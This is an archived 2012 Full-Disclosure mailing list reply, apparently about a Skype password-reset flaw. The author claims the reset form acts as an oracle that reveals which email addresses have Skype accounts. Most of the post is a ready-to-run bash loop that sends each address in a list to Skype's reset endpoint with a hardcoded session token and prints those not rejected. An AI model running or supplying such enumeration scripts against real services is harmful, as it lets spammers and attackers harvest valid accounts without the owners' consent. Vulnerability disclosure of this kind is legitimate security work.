lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Wed, 14 Nov 2012 16:44:34 +0100
From: klondike <klondike@...ndike.es>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: Skype account + IM history hijack
	vulnerability

El 14/11/12 11:20, Kirils Solovjovs escribió:
> The team has worked around this and are now trying to fix the
> bug/feature. :)
>
> http://www.reddit.com/r/netsec/comments/13664q/skype_vulnerability_allowing_hijacking_of_any/
Well, they also seem to be vulnerable to oracle attacks against the
e-mail database through the same forgotten password form so I wouldn't
be surprised if an spammer has already been exploiting this.

Below is the classical bash script to exploit it, just input a newline
separated list of e-mails and it will send the request and filter those
which are clearly not in the database:
$ while read mail trash; do curl
'https://login.skype.com/account/password-reset-request' -s -o- -b
"skype-session-token=336ff76c68bf17b54eb0d2dc81f8bd6f1500a7fd" -d
"email=$mail&session_token=336ff76c68bf17b54eb0d2dc81f8bd6f1500a7fd" |
fgrep "The email address you entered is invalid." > /dev/null || echo
$mail; done

klondike


Download attachment "signature.asc" of type "application/pgp-signature" (263 bytes)

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ